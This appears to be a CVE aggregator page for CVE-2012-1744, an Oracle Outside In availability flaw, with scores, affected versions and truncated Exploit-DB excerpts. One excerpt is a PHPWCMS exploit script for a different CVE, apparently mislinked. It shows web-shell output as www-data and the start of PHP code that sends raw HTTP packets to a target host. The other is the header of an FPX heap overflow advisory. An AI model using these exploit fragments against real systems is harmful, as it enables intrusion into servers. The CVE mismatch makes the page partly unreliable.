CVE-2012-1744
published 2012-07-17CVE-2012-1744: Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent users to affect…
PriorityP410low2.1CVSS 2.0
AVLACLAuNCNINAP
EXPLOIT
EPSS
0.88%
55.3th percentile
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent users to affect availability via unknown vectors related to Outside In Filters.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | fusion_middleware | — | — |
| oracle | fusion_middleware | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHPWCMS 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities
exploitdb·2012-12-17
CVE-2013-1744 PHPWCMS 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities
PHPWCMS 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities
---
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
phpwcms-shell> uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
################################################################################################
*/
error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80))) die("\n(-) No response from {$host}:80\r\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+-----------------------------------------------------------+";
print "\n| phpwcms \n";
print "\nExample....: php $argv[0] localhost / admin pass";
print "\nExample....: php $argv[0] localhost /phpwcms-1.5.4.6/ jack bl
Exploit-DB
Oracle Outside-In - '.FPX' File Parsing Heap Overflow
exploitdb·2012-07-20
CVE-2012-1744 Oracle Outside-In - '.FPX' File Parsing Heap Overflow
Oracle Outside-In - '.FPX' File Parsing Heap Overflow
---
#####################################################################################
Application: Oracle Outside-In FPX File Parsing Heap Overflow
Version: he vulnerabilities are reported in versions 8.3.5 and 8.3.7.
Exploitation: Remote code execution
Secunia Number: SA49936
{PRL}: 2012-26
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Timeline
3) Technical details
4) PoC
#####################################################################################
1) Introduction
Oracle Outside In Technology provides software developers with a comprehe
No writeups or analysis indexed.
http://www-01.ibm.com/support/docview.wss?uid=swg21660640http://www.mandriva.com/security/advisories?name=MDVSA-2013:150http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.htmlhttp://www.securityfocus.com/bid/54552http://www.securitytracker.com/id?1027264https://exchange.xforce.ibmcloud.com/vulnerabilities/77012http://www-01.ibm.com/support/docview.wss?uid=swg21660640http://www.mandriva.com/security/advisories?name=MDVSA-2013:150http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.htmlhttp://www.securityfocus.com/bid/54552http://www.securitytracker.com/id?1027264https://exchange.xforce.ibmcloud.com/vulnerabilities/77012
2012-07-17
Published